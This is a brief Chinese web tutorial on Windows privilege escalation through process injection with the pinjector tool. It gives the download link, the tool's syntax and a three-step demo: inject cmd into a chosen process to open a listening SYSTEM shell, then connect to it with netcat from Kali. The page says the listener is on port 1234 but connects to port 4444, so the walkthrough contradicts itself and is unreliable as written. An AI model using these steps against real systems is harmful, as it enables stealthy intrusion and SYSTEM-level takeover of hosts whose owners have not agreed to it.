Windows进程注入提权 |
您所在的位置:网站首页 › 注入系统进程 › Windows进程注入提权 |
Windows进程注入提权
|
目录 简介 工具下载地址 工具使用方法 实例演示 简介通过进程注入不会创建新的进程,隐蔽性比较高,可以通过"pinjector"工具实现进程注入 工具下载地址 https://www.tarasco.org/security/Process_Injector/index.html (需要FQ) 工具使用方法 pinjector.exe -l 查看可利用的进程pinjector.exe -p pid cmd port 对pid进程执行注入,并建立侦听端口 实例演示1.运行以下命令,查看当前进程,以及进程权限。 pinjector.exe -l
2.指定某个进程的pid 然后将cmd注入到其中,同时开启侦听窗口1234。 pinjector.exe -p 1284 cmd 1234
3.使用kali中的nc去连接目标服务器的4444端口,获取system权限的shell。 nc -nv 192.168.31.132 4444
|
【本文地址】